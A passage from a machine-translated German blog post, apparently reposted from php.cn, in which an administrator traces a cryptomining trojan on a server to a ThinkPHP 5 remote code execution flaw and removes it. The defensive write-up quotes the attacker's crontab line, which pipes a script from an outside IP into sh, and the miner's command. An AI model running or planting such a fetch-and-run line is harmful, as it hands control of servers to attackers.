Heim >PHP-Framework >Denken Sie an PHP >Erfahrungen mit der Trojaner-Entfernung: Umgang mit einem Trojaner, der die Schwachstelle thinkphp5 zur Remotecodeausführung ausnutzt

Erfahrungen mit der Trojaner-Entfernung: Umgang mit einem Trojaner, der die Schwachstelle thinkphp5 zur Remotecodeausführung ausnutzt

藏色散人
藏色散人nach vorne
2021-04-06 14:13:402783Durchsuche

In der folgenden Tutorial-Kolumne von thinkphp erfahren Sie, wie Sie mit einem Trojaner umgehen, der die Schwachstelle thinkphp5 zur Remotecodeausführung ausnutzt. Ich hoffe, dass es für Freunde in Not hilfreich ist!

Erfahrungen mit der Trojaner-Entfernung: Umgang mit einem Trojaner, der die Schwachstelle thinkphp5 zur Remotecodeausführung ausnutzt

Erinnern Sie sich an ein Trojaner-Entfernungserlebnis: Der Umgang mit einem Trojaner, der die Schwachstelle thinkphp5 zur Remotecodeausführung ausnutzte

Gestern stellte ich fest, dass ein Server plötzlich langsamer wurde. Top zeigte, dass mehrere Prozesse mehr als 100 % nutzten CPU

Führen Sie den Befehl aus für:

/tmp/php  -s /tmp/p2.conf

Es ist fast sicher, dass es gehackt wurde

Der nächste Schritt besteht darin, die Quelle zu ermitteln

Der letzte hat keinen Anmeldedatensatz

Töten Sie diese Prozesse zuerst, aber nach ein paar Tagen erscheint er erneut Minuten

Sehen wir uns zunächst an, was dieser Trojaner tun möchte

Netstat hat gesehen, dass dieser Trojaner einen Port geöffnet und eine Verbindung mit einer bestimmten IP im Ausland hergestellt hat

Aber tcpdump konnte eine Zeit lang keine Datenübertragung feststellen

Was wollte er? zu tun?

Überprüfen Sie weiterhin die Protokolle

Ich habe im Cron-Protokoll festgestellt, dass der WWW-Benutzer einen Crontab-Timing-Vorgang hat, was im Grunde das Problem ist

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

Ich habe ein paar Fragen heruntergeladen und es mir angesehen, es sollte ein Mining-Trojaner-Programm sein

Server Der WWW-Benutzer auf der Website wurde durch die Installation von lnmp erstellt. Wenn man sich die Quelle ansieht, handelt es sich möglicherweise um eine Web-Sicherheitslücke.

Schauen Sie sich noch einmal an, die Berechtigungen von PHP unter /tmp lauten www

Überprüfen Sie die Protokolle mehrerer Websites unter lnmp und stellen Sie fest, dass es die kürzlich in thinkphp 5 aufgedeckte Sicherheitslücke bei der Remotecodeausführung nutzt

Details zur Sicherheitslücke: https://. Nosec.org/ home/detail/2050.html

Reparieren Sie das Problem und lösen Sie es

Aber diese Seite ist eine Testseite und der Port, der lauscht, ist 8083. Könnte es sein, dass Hacker jetzt anfangen können, unkonventionelle Ports auszuspionieren?

Quelle: https://www.simapple.com/425.html

Verwandte Empfehlungen: Die neuesten 10 Thinkphp-Video-Tutorials

Das obige ist der detaillierte Inhalt vonErfahrungen mit der Trojaner-Entfernung: Umgang mit einem Trojaner, der die Schwachstelle thinkphp5 zur Remotecodeausführung ausnutzt. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Dieser Artikel ist reproduziert unter:simapple. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen